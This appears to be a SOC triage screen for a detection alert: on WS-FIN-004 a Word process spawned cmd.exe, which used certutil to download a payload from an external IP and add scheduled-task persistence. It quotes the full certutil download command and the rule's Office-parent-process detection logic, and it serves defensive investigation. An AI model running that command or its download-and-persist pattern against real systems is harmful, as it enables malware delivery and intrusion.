Triage queue
// Operations
Word spawned a shell that downloaded a remote payload
winword.exe created cmd.exe on WS-FIN-004, which used certutil to retrieve u.dat from 45.61.136.14 and registered it as a recurring scheduled task.
ALT-D6DD3DHighNew
78Elevated
Why this fired
Any event where parentProcess is one of winword.exe, excel.exe, outlook.exe, powerpnt.exe
A document application starting a shell or scripting host. Word does not legitimately need to launch PowerShell, so this is near-always macro execution.
Triggering event
The exact record that satisfied the rule.
Process ExecutionHigh2026-09-04 17:45:29ZCrowdStrike Falcon
winword.exe spawned cmd.exe which invoked certutil to retrieve a remote file
cmd.exe /c certutil -urlcache -split -f http://45.61.136.14/u.dat %TEMP%\u.dat
What else was happening
Other activity for ekowalski in the surrounding hour.
| Time | Event | Severity | Host |
|---|---|---|---|
| 2026-09-04 17:24:11Z | Authentication Failure | Low | WS-FIN-007 |
| 2026-09-04 17:46:09Z | Network Allow | Medium | — |
| 2026-09-04 17:47:04Z | Persistence Created | High | WS-FIN-004 |
| 2026-09-04 17:52:54Z | Authentication Failure | Low | WS-FIN-004 |
| 2026-09-04 18:02:03Z | Authentication Success | Info | WS-FIN-012 |
| 2026-09-04 18:26:22Z | Authentication Success | Info | WS-FIN-004 |
Alert
- Raised
- 7d ago
- Last updated
- 7d ago
- Risk score
- 78
- Source
- CrowdStrike Falcon
- Detected by
- Correlation rule
Entity risk
68Elevated
ekowalski carries a standing risk score derived from all of its activity, not just this alert.
Open the entity profile